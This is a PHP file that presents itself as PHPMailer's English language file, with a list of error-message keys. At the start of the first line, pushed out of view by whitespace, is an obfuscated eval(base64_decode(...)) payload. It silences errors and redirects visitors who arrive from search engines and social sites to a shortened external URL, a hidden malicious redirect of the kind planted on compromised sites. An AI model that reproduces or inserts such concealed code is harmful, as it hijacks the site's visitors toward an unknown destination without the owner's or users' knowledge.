<?php	                                       			eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90aW55dXJsLmNvbS9hZWxud2o0Iik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));
/**
 * PHPMailer language file.
 * English Version
 */

$PHPMAILER_LANG = array();

$PHPMAILER_LANG["provide_address"] = 'PHPMAILER_PROVIDE_ADDRESS';
$PHPMAILER_LANG["mailer_not_supported"] = 'PHPMAILER_MAILER_IS_NOT_SUPPORTED';
$PHPMAILER_LANG["execute"] = 'PHPMAILER_EXECUTE';
$PHPMAILER_LANG["instantiate"] = 'PHPMAILER_INSTANTIATE';
$PHPMAILER_LANG["authenticate"] = 'PHPMAILER_AUTHENTICATE';
$PHPMAILER_LANG["from_failed"] = 'PHPMAILER_FROM_FAILED';
$PHPMAILER_LANG["recipients_failed"] = 'PHPMAILER_RECIPIENTS_FAILED';
$PHPMAILER_LANG["data_not_accepted"] = 'PHPMAILER_DATA_NOT_ACCEPTED';
$PHPMAILER_LANG["connect_host"] = 'PHPMAILER_CONNECT_HOST';
$PHPMAILER_LANG["file_access"] = 'PHPMAILER_FILE_ACCESS';
$PHPMAILER_LANG["file_open"] = 'PHPMAILER_FILE_OPEN';
$PHPMAILER_LANG["encoding"] = 'PHPMAILER_ENCODING';
$PHPMAILER_LANG["signing"] ='PHPMAILER_SIGNING'

?>